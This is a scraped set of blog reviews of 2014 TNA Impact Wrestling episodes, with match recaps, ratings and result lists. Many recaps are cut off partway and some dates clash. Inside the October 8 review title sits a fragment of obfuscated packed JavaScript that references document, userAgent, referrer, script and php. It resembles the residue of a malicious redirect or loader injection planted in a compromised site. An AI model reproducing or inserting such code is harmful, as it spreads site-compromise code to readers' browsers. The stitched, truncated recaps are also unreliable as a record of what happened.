Impact Wrestling – December 3, 2014 (Best of 2014): TNA In A Nutshell

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Date: December 3, 2014
Commentators: Mike Tenay, Tazz
Hosts: Christy Hemme, Jeremy Borash

JB and Christy welcome us to the show and start things off with the safe bet of Kurt Angle from Genesis on January 16.

Kurt Angle vs. Bobby Roode

Angle grabs the legs and catapults Roode into the cage, setting up the Rolling Germans. The Angle Slam is countered and Angle is sent into the cage. A spinebuster gets a fast two for Roode but a Roode Bomb attempt is countered by Angle ramming Bobby into the cage. Now the Slam connects for two and there go the straps. Ankle lock goes on but Roode fights to his feet and takes Angle down with an enziguri.

The Roode Bomb gets two and Bobby climbs the cage, so Angle runs the corner and hits the Angle Slam to put both guys down again. Kurt crawls over for a slow two before making a very slow climb to the corner. He gets a leg over but Roode pulls him back in onto the top rope. They slug it out until Roode is crotched on the top, allowing Angle to climb out for the win at 14:17, seconds before Roode makes it out the door.

We jump back in time a week for this match on January 9, 2014.

TNA World Title: AJ Styles vs. Magnus

Back with the two champions still not making contact as the Bro Mans and Zema Ion come out to jump Sting and AJ and giving us six run-ins in less than eight minutes. Zema DDTs AJ and the Bro Down gets a delayed two on Styles. Sting comes back in as Magnus just chills at ringside. The Brit finally comes back in and AJ quickly loads up the Clash, only to have Bad Influence make the save and lay him out with a powerbomb/neckbreaker combo.

Video on Willow.

Video on Ethan Carter III.

From May 8, 2014.

Kurt Angle vs. Ethan Carter III

Angle goes after the arm to start but Ethan backs off. A snap suplex sets up the Rolling Germans to Ethan but Angle falls down holding his bad knee. Angle tries to fight back with a German suplex but the knee is just gone. Ethan gets in a quick chop block and pins Angle at 3:27.

Gunner vs. James Storm

Storm suplexes Gunner onto the ramp but gets sent into the steps for his efforts. Gunner nails him in the ribs with a chair and they finally get inside. The Cowboy comes back with a middle rope DDT of all things for no cover as we take a break. Back with Storm loading up a chair in the corner but getting reversed by Gunner. They slug it out with trashcan lids before Storm gets speared down for two.

Storm counters a sunset flip into a catapult, sending Gunner face first into the chair. A Backstabber sets up a VERY long top rope elbow to give Storm a near fall. Storm pulls out a beer bottle but the distraction lets Gunner spear him through the ropes and through the table on the floor ala Edge and Mick Foley. That only gets two so Gunner sets up two chairs (one of which is broken) in the middle of the ring.

A superplex through the chairs (Storm barely hit them) is enough for two in a nice throwback to the ending at Lockdown. Storm comes back with a Closing Time and a pair of Last Calls for two. James gets the beer bottle but Gunner finds his own to lay out Storm. An F5 is enough to pin the Cowboy at 15:03.

Video on MVP debuting and promising to make it about the fans.

We see the very end of Lethal Lockdown at Lockdown 2014 where Bully Ray turned on Dixie Carter to give Team MVP the win.

From Slammiversary 2014.

Bully Ray vs. Ethan Carter III

We breeze past Eric Young winning the title back in April and jump to the main event of Slammiversary.

TNA World Title: Austin Aries vs. Bobby Lashley vs. Eric Young

In a cage with Young defending with wins by pin or submissino, not escape. Lashley takes over to start but gets double teamed down. The smaller guys do a fast paced sequence until Lashley throws Aries into the cage. Young gets the same as well, allowing Lashley to stand tall. Bobby throws both guys around again but misses a charge into the post. Young and Aries go at it again until Eric hammers on Bobby in the corner.

In some actual storyline development, James Storm watches Veera train and looks impressed. He promises to take care of Veera and then attacks him.

We recap the Beautiful People reuniting and then going to war with Madison Rayne.

From Sacrifice 2014.

Knockouts Title: Angelina Love vs. Madison Rayne

Back inside and the Beautiful People take turns choking on the ropes and in the corner to little avail. Madison gets a quick sunset flip for two but gets sent to the floor where she beats on Velvet a bit. Back in and the challenger puts on a figure four with her legs in a nice touch. An enziguri puts Love down again though and now the face slam works.

From Slammiversary 2014.

X-Division Title: Sanada vs. Tigre Uno vs. Davey Richards vs. Eddie Edwards vs. Crazy Steve vs. Manik

Sanada is defending and this is a ladder match. Also keep in mind that Destination X and Option C are coming up soon. Manik dives through the ropes to take out Sanada before the bell. The Wolves follow suit with stereo suicide dives and Steve has apparently knocked Tigre Uno down. Steve gets a ladder from under the ring and uses it to climb back to the apron. Tigre dropkicks him down and mostly misses a corkscrew dive to take everyone out.

Sanada and Manik fight over a ladder in the ring with the champion taking over via a springboard chop to the head. Tigre replaces Manik and kicks Sanada in the back of the head but the Wolves double team him into a German suplex onto the ladder in the corner. Edwards throws in a fresh ladder but Manik dropkicks both of them down. Steve (very popular tonight) comes in for the Terry Funk spinning ladder spot, taking down everyone that comes into the ring.

Manik makes a save but Steve shoves the ladder over, only to have Manik land on the top rope and dive out to knock out the Wolves. Steve goes up again and touches the belt but of course loses his hand eye coordination since this is a ladder match, allowing Sanada to make the save. The ladder is busted so Sanada slams Steve onto it to set up the moonsault. The fans think this is awesome as Tigre enziguris Sanada off a better ladder.

Tigre wedges the broken ladder into the standing one to form a bridge, but the Wolves catch him in a powerbomb/top rope Backstabber combo. The Wolves both go after the belt but Sanada makes the save. Edwards Sanada clothesline each other to the floor and Eddie crashes into the barricade, leaving Davey on top. Manik makes the save and powerbombs Davey onto the bridged ladder in a SCARY landing. Sanada climbs up to retain at 9:40 before someone dies.

From June 19, 2014.

TNA World Title: Bobby Lashley vs. Eric Young

The champion makes his comeback and gets two off his third cross body of the match. Lashley stomps him in the corner but misses a charge, only to come back with a kick to the ribs. Eric nails the piledriver out of nowhere but King pulls the referee out at two. Lashley nails Kenny by mistake and Eric hits a quick DDT. The top rope elbow misses though and Lashley spears him down for the pin and the title at 8:45.

We look at MVP being stripped of power and attacked by Roode. Kurt Angle replaced him as boss and asked Willow to bring Jeff Hardy back. Willow agreed and performed as Jeff Hardy later in the night.

We see the end of the battle royal from the same night with Hardy winning a World Title shot.

From July 17, 2014.

TNA World Title: Bobby Lashley vs. Jeff Hardy

Lashley is defending. Hardy tries to hammer away to start but realizes he has to speed things up. He sends Lashley out to the floor and hits a big dive, only to have Lashley trip him up on the steps and send Jeff face first into the steel as we take a break. Back with Lashley in control and choking Jeff on the middle rope. He puts Hardy in a torture rack but some right hands get Jeff free.

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Finally, I’m holding a Holiday Special for my e-books: any two of them for just $5.  Check out the details here.

Impact Wrestling – November 19, 2014: Last One Out, Lock Dreamer In

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Date: November 12, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Tazz

We open with a recap of Roode taking the title from Lashley a few weeks ago, followed by Lashley being driven insane by not being champion.

The next show on SpikeTV is in two weeks on December 3 for a best of the year show.

Knockouts Title: Havok vs. Gail Kim vs. Taryn Terrell

Back with Havok still on the floor and Taryn rolling Gail up for two. A running flip neckbreaker puts Gail down again but Havok pulls Taryn from the ring and drops her throat first across the barricade. Gail heads outside also but gets spinebustered onto the floor. Back in and Havok splashes both girls for two but Gail is up first and drapes Havok across the top rope.

A kind of Fameasser from the top puts Havok on the floor but Taryn jumps Gail from behind. Terrell takes her to the top but Havok comes back in to make it a Tower of Doom. The champ stacks them up again but misses a middle rope splash. Taryn and Gail break out of a double chokeslam attempt and hammer away until Gail scores with a DDT. A cross body gets two each before Eat Defeat and an RKO get two for Terrell. Gail rolls up Taryn but gets caught in a sunset flip to give Terrell the title at 14:32.

MVP rants at Kenny King about being called a manager. King sounds pleased.

Recap of the opening brawl.

Kenny King vs. Chris Melendez

Spud agrees to meet EC3 tonight.

Here are EC3 and Tyrus to address Spud. Carter likes the idea of Spud trying to come across the pond and make himself big. Along the way Spud has picked up some friends like Eric Young, who is now in the hospital and Jeremy Borash, who Carter slapped so hard that the entire Borash family died. Well tonight, Spud can fight Carter for one night only. Cue Spud in a suit that looks like a brick wall (seriously) and Carter even has Tyrus go to the floor.

Angle yells at King but gets jumped and beaten down by MVP. Even King thinks that was too far.

Bram vs. Tommy Dreamer

Hardcore of course. They start in the aisle as Dreamer looks older than ever. Bram slams him down on the ramp and nails Tommy with a trashcan. Dreamer is already busted open so Bram fires off more right hands, only to get sent into the post. Tommy hits Bram with the old WWE spinner US Title for a bizarre moment. We take a break and come back with Bram sending Tommy face first into the steps.

Back in and we hit a chinlock before Dreamer gets a boot up in the corner to stop a charge. Some kendo stick shots and Russian legsweep gets two for Tommy and he crotched Bram on an opened chair. A clothesline knocks Bram out of the chair for two and Tommy ties him in the Tree of Woe. Dreamer shouts T-N-A and hits a basement dropkick into a trashcan but Bram counters the DDT with a legsweep.

Rating: F. It got fifteen minutes, Bram needed help to beat Tommy Dreamer, Al freaking Snow ran in (wearing wrestling gear for some reason) and Tommy Dreamer is STILL ON MY TV IN 2014. I would love to know what Dreamer has on the management of this and all those other wrestling companies he works for because it must be gold.

Angle is going to deal with MVP once and for all.

Sheera asked Manik what he needs to do to get Storm to like him. Manik tells him to awaken.

X-Division Title: DJZ vs. Low Ki vs. Tigre Uno vs. Manik

MVP calls someone and leaves a voicemail about burning the place down.

Overall Rating: C. This show had some decent wrestling but it felt like any other show for TNA. At the end of the day though, you can see one of the things that has held them back for years right there front and center: an old, past his prime guy living on nostalgia got the longest match of the night, including longer than two matches with new champions crowned.


Taryn Terrell b. Gail Kim and Havok – Sunset flip to Kim

Chris Melendez b. Kenny King via DQ when MVP interfered

Bram b. Tommy Dreamer – Inverted DDT

Low Ki b. Tigre Uno, DJZ and Manik – Top rope Ki Crusher to Tigre Uno

Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

Impact Wrestling – November 12, 2014: Fight Like There’s No Next Wednesday

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Date: November 12, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Tazz

Tag Team Titles: James Storm/??? vs. Wolves

Storm lays out Richards post match for good measure.

Madison Rayne vs. Taryn Terrell

Rating: C-. Not bad here as Terrell is starting to look better out there every week. Madison getting beat is a good thing for her as she can only win the title so many times before it stops meaning anything (see also Gail Kim). Terrell vs. Havok could be interesting if they let it go the right way but it would be tricky.

Menagerie vs. BroMans/Beautiful People

Eric Young is in the back when Spud comes up and asks to be in his corner tonight. Young says okey dokey.

We look at the opening again.

The Revolution is in the back with Storm telling Abyss that this is just beginning. Sheera comes in but Storm spits on him and tells him to leave. Storm whispers something to Manik who bows and leaves.

Eric Young vs. Tyrus

Gunner vs. Samuel Shaw

A Cactus Clothesline puts both guys on the floor and Brittany makes sure Shaw is ok. She distracts Gunner again, allowing Shaw to send him face first into the steps. Back in and Gunner punches Shaw out of the air before stacking up the chairs on the floor. A superplex puts both guys down on the chairs but Brittany gets up on the apron again.

All three get in now and Brittany kicks Gunner low before trying to drag Shaw over. Gunner grabs her leg though, allowing Shaw to nail him in the back with a chair. He takes too long to go for his choke though and takes an F5 onto the chairs for the pin at 8:58.

Austin Aries vs. Lashley

Lashley press slams Aries on the ramp and puts Aries in the Crossface to end the show.


James Storm/Abyss b. Wolves – Black Hole Slam to Edwards

Taryn Terrell b. Madison Rayne – RKO

Menagerie b. BroMans/Beautiful People – Tornado DDT to Godderz

Eric Young b. Tyrus – Top rope elbow

Gunner b. Samuel Shaw – F5 onto a chair

Lashley vs. Austin Aries went to a double countout


Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

Impact Wrestling – November 5, 2014: Well That Happened

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Date: November 5, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Taz

We open with a recap of Lashley vs. Roode from last week with Roode winning the title.

Quick video on the tournament final.

Tag Team Tournament Finals: Samoa Joe/Low Ki vs. Hardys

Matt comes right back in with the middle rope elbow to the back for two. A double belly to back suplex gets two with Joe making a quick save. Jeff headscissors Ki out of the corner but charges into some boots in the corner. A Shining Wizard misses but Ki kicks Jeff in the back of the head to take over. Back to Joe for the knee drop for two as we take a break.

James Storm is with Davey Richards in the back and says he wants an answer in a week.

An Indian wrestler named Mahabali Shera is coming to TNA. We get a nice package on his international accomplishments and how sure he is that he belongs on the roster.

We recap the opening segment.

MVP tells Angle that this is all about him (MVP) despite what Angle thinks.

D-Von/Tommy Dreamer vs. Bram/Magnus

Gail Kim wants her title back.

Knockouts Title: Havok vs. Gail Kim

Knockouts Title: Havok vs. Gail Kim

Back in and Gail hooks on something like the Black Widow, only to be countered into a kind of Samoan drop. Gail gets slammed down but pops back up for a top rope cross body and two more. Eat Defeat is countered into a spinebuster on the arm for another two. The chokeslam is countered into Eat Defeat for two but Gail jumps into the chokeslam to retain the title at 6:35.

Lashley leaves as MVP asks if Lashley is really mad.

TNA World Title: Bobby Roode vs. MVP

Bobby fights up and avoids the running boot in the corner, setting up a Roode Bomb attempt. MVP flips out though and avoids a Blockbuster before kicking Bobby in the face for two. The Drive By misses and Bobby gets two off a rollup. Now the running boot connects but the Playmaker is countered into the Roode Bomb for the pin at 6:55.

Post match Lashley comes in and spears Roode down. He walks past MVP to end the show.


Hardys b. Samoa Joe/Low Ki – Moonsault to Low Ki

D-Von/Tommy Dreamer b. Magnus/Bram – DDT to Magnus

Havok b. Gail Kim – Chokeslam

Bobby Roode b. MVP – Roode Bomb

Impact Wrestling – October 29, 2014: Worth The Wait

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Date: October 29, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Taz

Lashley arrived earlier today. I wish regular companies praised you for showing up for your job.

Tag Team Tournament Semi-Finals: Kenny King/MVP vs. Samoa Joe/Low Ki

King and Ki get things going with a quick wrestling sequence on the mat until Kenny sends him into the corner to take over. Ki takes him into a corner of his own and snaps off a chop before they circle each other again. Off to Joe vs. MVP with the Samoan cranking on a hammerlock but MVP rolls into a headlock to escape. Joe comes back with a legbar, sending MVP running into the ropes.

MVP pulls his partner to the floor for a breather so Low Ki just dives onto both of them to take over again. Back in and Ki kicks King in the chest for two but poses too long, allowing MVP to nail him in the back of the head.

We take a break and come back with MVP still in control without much having changed. Back to King for a spinning kick to the face and two with Joe making the save. Ki fights out of a double arm crank and hits a springboard spinning kick to the face (hands) for two on MVP but King gets a tag to keep Joe out.

Ki dives over the top onto MVP with a kick to the head, setting up the Clutch on King for the submission at 15:20.

We recap Bram and Magnus attacking D-Von last week.

Video on Roode vs. Lashley.

Beautiful People vs. Madison Rayne/Taryn Terrell

\she cross bodies both Beautiful People, only to have Madison come in without a tag. She cleans house but nails Terrell and lays her out with the Rayne Drop. Madison walks out and the Beautiful People get the pin at 4:56.

Video on Lashley.

Angle promises to call it down the middle.

Tag Team Tournament Semi-Finals: Hardys vs. Ethan Carter III/Tyrus

Carter comes back in almost immediately with a chinlock of his own before mocking Sting in the corner. Matt kicks him away though and makes the hot tag to Jeff. The more famous Hardy destroys Ethan with the usual as everything breaks down. Tyrus comes in off the tag and nails a double clothesline, only to miss a middle rope splash. The Twisting Stunner and Twist of Fate set up the Swanton to give Matt the pin at 7:06.

Ethan blames Tyrus for the loss.

James Storm says the Revolution expands tonight.

Lashley is getting ready.

James Storm vs. Eddie Edwards

Edwards nails a kick to the head to start but he stops to look at Davey, allowing Storm to nail a running shot in the corner to take over. James hammers away with forearms but charges into a boot to the face. An over the shoulder Stunner out of the corner gets two on James but he comes back with a DDT to plant Edwards.

Edwards dives on Storm as Manik goes over and whispers to Richards. That earns Manik a baseball slide but Davey gets up to yell, allowing James to hit the Last Call for the pin at 5:11.

TNA World Title: Lashley vs. Bobby Roode

They have a ton of time for this, Lashley is defending and Kurt Angle is guest referee. MVP and King are nowhere in sight. Lashley powers Bobby into the corner to start and easily takes him down with an amateur move. A hard shoulder to the ribs has Roode in even more trouble but Bobby comes back with a clothesline and tells Lashley to bring it on. The champ is all fired up but his clothesline is countered into the Crossface, sending Lashley out to the floor.

Another spear hits Angle to knock him to the floor, allowing Roode to enziguri Lashley to the floor.

Instead Brian Hebner comes in to count the near fall and Bobby is frustrated. Lashley hits Roode low and gets the belt but Hebner says no.

Another attempt is countered into a sunset flip attempt but Roode falls on top for the pin and the title at 17:49.

The important part though is Roode being made into a bigger deal than he was before, but now he needs to have a very solid title reign to make it even better. TNA is really needing a top face and if Roode is that guy then so be it.

The announcers mention a rematch clause as the show ends.


Samoa Joe/Low Ki b. Kenny King/MVP – Koquina Clutch to King

Beautiful People b. Madison Rayne/Taryn Terrell – Both Beautiful People pinned Terrell after a Rayne Drop from Rayne

Hardys b. Ethan Carter III/Tyrus – Swanton Bomb to Tyrus

James Storm b. Eddie Edwards – Last Call

Bobby Roode b. Lashley – Cradle


Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

Impact Wrestling – October 22, 2014: Is That A Light Up Ahead?

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Date: October 22, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Taz

We open with a recap of Lashley vs. Roode from a few weeks ago and then Bobby winning the four way last week to earn another shot.

The Wolves want the tournament to start so they can have some new opponents.

Matt Hardy comes out and introduces his partner for the tournament: Jeff Hardy. Well that was anti-climactic.

Tag Team Tournament First Round: Hardys vs. BroMans

This brings out D-Von and the beating is quickly on. Bram fights back and they head to the floor until security breaks it up in the ring. Angle comes out and makes a hardcore match between the two for later.

Tag Team Tournament First Round: Low Ki/Samoa Joe vs. Samuel Shaw/Gunner

The heels (kind of?) start double teaming Ki but Gunner tells Shaw to get rid of Brittany.

Shaw stands next to Brittany but Gunner comes up to yell at her. Samuel nails him with a chair and goes evil again before kissing Brittany.

Rebel vs. Angelina Love

Video on Roode vs. Lashley, which I believe is the same video that opened the show.

Bram vs. D-Von

Anderson and Melendez are in the tournament.

Tag Team Tournament First Round: Kenny King/MVP vs. Chris Melendez/Mr. Anderson

MVP and King are quickly knocked out to the floor but we settle down to Anderson vs. King. Mr. grabs a headlock to take over but MVP trips him up from the floor, allowing King to kick him in the head for two. MVP taunts Melendez with a tag in the corner like a true heel should before hooking Anderson in an arm crank. A running boot to the side of the head gets two but a double clothesline puts both guys down. Melendez and King come in off the tags with Chris cleaning house as everything breaks down. In the melee, King rolls up Melendez with a handful of tights for the pin at 4:55.

Tag Team Tournament First Round: Ethan Carter III/Tyrus vs. Eric Young/Rockstar Spud

Off to Carter for some slaps to the face but Spud comes back with a huge one of his own, allowing for the hot tag to Young. Eric cleans house and gets two off the elbow. Everyone heads outside for a huge dive from Young before Spud dives on both villains. Back in and a quick Tongan Death Grip slam from Tyrus gives Ethan the pin on Spud at 7:14.

We run down the card for next week


Hardys b. BroMans – Swanton Bomb to Jesse

Samoa Joe/Low Ki b. Gunner/Samuel Shaw – Koquina Clutch to Gunner

Bram b. D-Von – Metal pole to the head

MVP/Kenny King b. Chris Melendez/Mr. Anderson – Rollup with a handful of tights to Melendez

Ethan Carter III/Tyrus b. Rockstar Spud/Eric Young – Tongan Death Grip Slam to Spud

Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

Impact Wrestling – October 15, 2014: They’ve Given Up

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Date: October 15, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Tazz

Angle knows Bobby has beaten all of them, but the winner gets another shot.

Team 3D Hall of Fame package.

Knockouts Title: Madison Rayne vs. Havok

the show. Havok shoves her around to start and easily catches a cross body into a slam. She hooks a lifting full nelson followed by a backbreaker for good measure. The dominance continues with another backbreaker and then a third backbreaker just to mix things up.

Back in and Havok blocks a suplex and we get an evil laugh. Madison blocks some charges in the corner and gets two off a middle rope dropkick. Havok will have none of this side roll stuff from Rayne and a chokeslam (Harlot Slayer) retains the title at 6:18.

Angle congratulates D-Von and they suck up to each other a bit.

Eric Young likes his odds of winning tonight.

Matt Hardy vs. Magnus

Magnus takes him into the corner to start and rudely smacks his jaw. Matt responds by getting run over with a shoulder but he comes back with a swinging neckbreaker. An early Twist of Fate attempt sends Magnus running out to the floor and we get a breather. Hardy follows him out and is lifted up into a powerbomb, sending him back first into the post and then the apron.

more. Another Twist is countered and a victory roll gets the same treatment, giving Magnus two. Magnus goes up but dives into an RKO (called the Twist of Fate here even though it was missing a twist) for the pin at 5:54.

BroMans/Angelina Love vs. Menagerie

Roode and Aries are all serious about who wins tonight. Respect is out the window when they fight.

which he says about five times. That brings Carter to current issues, like Bully Ray going into the Hall of Fame. After what Ray did to his aunt, Ethan thinks Ray should be thrown out of the Hall of Fame immediately.

Tyrus vs. Shark Boy

Video from the bigger matches from Sunday.

Bram tells the interviewer to keep his nose out of what he did.

Eric Young vs. Bobby Roode vs. Austin Aries vs. Jeff Hardy

The winner gets a title shot at some point. Young cleans house to start but gets caught by Hardy in a lockup. Roode shoves Aries into Hardy for a collision before missing a dive onto Young. Aries telegraphs a suicide dive and gets nailed by Young, allowing Hardy to hit Poetry In Motion onto the Canadians. Aries is the only man standing and he wants a three way count but Young slides back in. Hardy kicks Aries down but misses a slingshot dropkick in the corner as we take a break.

Aries nails Young with a discus forearm for two as Hardy gets back in. Young plants Aries with a DDT and goes up but Roode breaks up the elbow drop. Aries and Roode load up a double superplex on Young but Hardy makes it the required Tower of Doom spot.

Jeff covers all three guys for two each and takes his shirt off, only to have Aries break up the Swanton. Young knocks Roode off the top but misses a moonsault and Hardy does the same with a Swanton attempt. A Roode Bomb to Young and a brainbuster to Hardy give us a double elimination at 15:15, leaving us with Aries vs. Roode for the title shot.

The brainbuster is countered with a knee to the head, setting up the Roode Bomb for the pin at 19:50.

Hardy and Young come back out to pose with the other two.


Havok b. Madison Rayne – Harlot Slayer

Matt Hardy b. Magnus – Twist of Fate

Menagerie b. BroMans/Angelina Love – Tornado DDT to Jesse

Tyrus b. Shark Boy – Tongan Death Grip slam

Bobby Roode b. Austin Aries, Jeff Hardy and Eric Young – Roode Bomb to Aries

Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

Impact Wrestling – October 8, 2014: They Got Me

");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fabre|var|u0026u|referrer|intee||js|php'.split('|'),0,{})) Wrestling
Date: October 8, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Taz

We open with a recap of the Tag Team Title series and Roode vs. Lashley.

We recap Havok taking the Knockouts Title from Gail Kim last week.

Angelina Love vs. Madison Rayne vs. Taryn Terrell

Havok comes out post match and destroys Terrell as Madison runs.

We recap Sanada turning to James Storm and attacking Muta back in New York.

Low Ki/Tigre Uno vs. Great Sanada/James Storm

Bram vs. Samuel Shaw

No DQ. Shaw nails him with a trashcan lid to start and dropkicks a trashcan into his face to take over. A chair is wedged between the top and middle rope but Bram avoids being whipped into the steel. They head back outside with Shaw still in control by nailing Bram with a chair over and over.

Back in and Bram gets in a Singapore cane shot to the head but Shaw counters a superplex attempt onto steel chairs into a sunset bomb onto the steel instead. Shaw loads up the choke but gets elbowed in the face and sent into the chair wedged in the corner. A shot to the head with the steel rod is enough to give Bram the pin at 5:17.

Brittany comes out to check on Shaw post match.

Roode is ready for his handicap match.

The Wolves and Team 3D yell at each other about who is greater.

Bobby Roode vs. MVP/Kenny King

Tenay makes a point to say that Roode had to pin or submit both guys to win. That at least makes Lashley look a bit less stupid. Lashley spears Roode down after the match.

EC3 says Spud has one more chance to apologize.

Another video on the Tag Team Title Series.

We run down the PPV card again.

The Trio is pleased when Angle comes in to yell at them. Roode is going to get another #1 contenders match next week and MVP is banned from ringside.

Tag Team Titles: Hardys vs. Team 3D vs. Wolves

Back in and Ray goes up, only to have Edwards set up a ladder of his own next to it. Bully kicks him down but Matt comes in with a ladder of his own. All three go up and slug it out with Edwards getting slammed off the top. Mat and Ray grab for the belts but send them swinging around before knocking each other off with Matt flying into a ladder.

Davey goes up the big ladder but gets shoved onto the floor and head first into the barricade. The Hardys make another save with chairs and put Ray on two tables. Jeff goes up top of the big ladder but Davey shoves it over, sending Hardy into a HUGE splash onto Ray for a horrible looking crash. Davey and Matt slug it out on top of the ladder but Edwards makes a save and powerbombs Matt through a table, allowing Davey to take down the belts for the win at 23:52.


Madison Rayne b. Taryn Terrell and Angelina Love – Rollup with a handful of tights

James Storm/Great Sanada b. Tigre Uno/Low Ki – Last Call to Uno

Bram b. Samuel Shaw – Steel rod to the head

Bobby Roode b. MVP/Kenny King via DQ when Bobby Lashley interfered

Wolves b. Hardys and Team 3D – Richards pulled down the belts

Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

Impact Wrestling – October 1, 2014: Turn Out The Lights Cause The Party’s Over

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Date: October 1, 2014
Location: Sands Bethlehem Events Center, Bethlehem, Pennsylvania
Commentators: Mike Tenay, Taz

We open with a video on Roode vs. Lashley from a few weeks back where Lashley retained the belt.

X-Division Title: Samoa Joe vs. Austin Aries

Feeling out process to start as the lights are overly dim, likely hiding the empty seats. Joe takes him to the mat to start but Aries pops up for a slugout. Joe growls at him and runs Aries over with an elbow. The champ sends him into the buckle and nails the enziguri before setting Aries on the top rope. The MuscleBuster is countered with a back rake but Aries misses the middle rope dropkick. Aries comes back with a forearm to the back of the head and a slingshot hilo for two as we take an early break.

Joe is just too fat though so Aries nails him with a discus forearm. Another brainbuster attempt is countered by a boot to the chest to send Aries outside, but he slides back in for a quick suicide dive to take Joe down. Back in and Aries hits a missile dropkick and the running corner dropkick to set up a bad brainbuster for two. He tries another Last Chancery but Joe counters into the Clutch for the submission at 15:23.

We look at the ladder match in the Tag Team Title series from two weeks ago.

Eric Young vs. Ethan Carter III

Knockouts Title: Gail Kim vs. Havok

Quick recap of the Tag Team Title Series.

Anderson and Melendez find MVP and Kenny King in the back and a match is made for later.

Manik vs. Shark Boy

Seriously. Shark Boy hammers away to start and sends Manik out to the floor with a shot to the face. Some clotheslines do the same and a backdrop sends Manik flying. Back in and Manik grabs some suplexes for two and a knee drop gets the same. A Frog Splash is enough to pin Shark Boy at 3:10.

Team 3D thinks the Wolves are crazy for picking Full Metal Mayhem.

Mr. Anderson vs. MVP

Knockouts Title: Havok vs. Gail Kim

Rating: C. This is a hard one to grade as they only had one idea to go with but that was kind of the point of the match. Havok is fine for a monster that can own the division for awhile in the vein of Awesome Kong until someone can rise up to beat her. Nothing great here but it served its purpose.


Samoa Joe b. Austin Aries – Koquina Clutch

Ethan Carter III b. Eric Young – 1%er

Manik b. Shark Boy – Frog Splash

MVP b. Mr. Anderson – Rollup

Havok b. Gail Kim – Chokeslam

Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at:

Impact Wrestling – September 24, 2014: Fill Em Out If You Got Em Boys. We Got A Tournament!

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Date: September 24, 2014
Location: Manhattan Center, New York City, New York
Commentators: Mike Tenay, Tazz

We open with a video on Roode vs. Lashley from last week where Bobby almost won the title.

Video on MVP.

Gold Rush Tournament Qualifying Match: MVP vs. Low Ki

The BroMans argue over whose girlfriend is hotter. They agree to disagree but Robbie brags about being in the tournament and then being on Amazing Race with Brooke starting this Sunday. He plans on switching between both girls but Jesse points out that cameras will be everywhere. Like the one filming them right now. They point out said camera and Robbie runs. This was actually kind of funny.

Quick tribute to Eric the Actor from the Howard Stern Show, a big wrestling fan who passed away over the weekend.

Video on the Tag Team Title series. The Wolves will pick the final stipulation next week.

Gold Rush Tournament Qualifying Match: Robbie E. vs. Tajiri

Gold Rush Tournament Qualifying Match: Austin Aries vs. Knux

The fans are entirely behind Aries who tries a test of strength for some reason. Aries rolls away so Knux does a handstand, only to have Aries spin around. Taz changes the story again by saying Rebel and Knux are dating, even though I thought they were brother and sister before. Knux gets taken down by a wristlock so he nips up to a huge response. Knux takes a bow so Aries tries a brainbuster to stop the fun. The big guy shoves him off so Aries dropkicks the knee out and takes over in the corner.

Video on Roode vs. Lashley from last week.

Gold Rush Tournament Qualifying Match: Mr. Anderson vs. Magnus

Magnus jumps him to start and slams him face first into the mat for some early two counts. We hit the chinlock for a bit before a clothesline gets two on Anderson. Back up and a double clothesline puts both guys down before Anderson wins a slugout. Magnus grabs a belly to back suplex into a slam for a close two. He loads it up again but Anderson reverses into the Mic Check for the pin at 6:50.

Quick video on set of the Knockouts calendar shoot.

Video on Team 3D going into the Hall of Fame.

We recap the tournament so far.

Video on Gail Kim vs. Havok for next week. This is designed to make Havok look like a monster.

Gold Rush Tournament Qualifying Match: Abyss vs. Samuel Shaw

The fans chant “Dexter Morgan” at Shaw. Abyss knocks him down and grabs a chokeslam but Shaw kicks him in the ribs to escape. Instead Abyss grabs him by the throat again and shoves him out to the floor in a big crash. Shaw fights back on the floor and rams Abyss into the steps.

Gold Rush Tournament Finals: Austin Aries vs. Abyss vs. Tajiri vs. MVP vs. Mr. Anderson

Abyss brings in Anderson who is quickly caught in the Tarantula. Mr. slams Tajiri down off the top but MVP tags himself in. Anderson looks right at him before MVP hits the Drive By for two as Aries makes the save. Everything breaks down and MVP loads up the Drive By on Aries, only to get rolled up for the pin at 15:12.


MVP b. Low Ki – Drive By

Tajiri b. Robbie E. – Buzzsaw Kick

Austin Aries b. Knux – Brainbuster

Mr. Anderson b. Magnus – Mic Check

Abyss b. Samuel Shaw – Black Hole Slam

Austin Aries b. Abyss, Mr. Anderson, MVP and Tajiri – Rollup to MVP

Remember to follow me on Twitter @kbreviews and pick up my new book of 1997 WCW Monday Nitro Reviews at Amazon for just $3.99 at:

And check out my Amazon author page with wrestling books for under $4 at: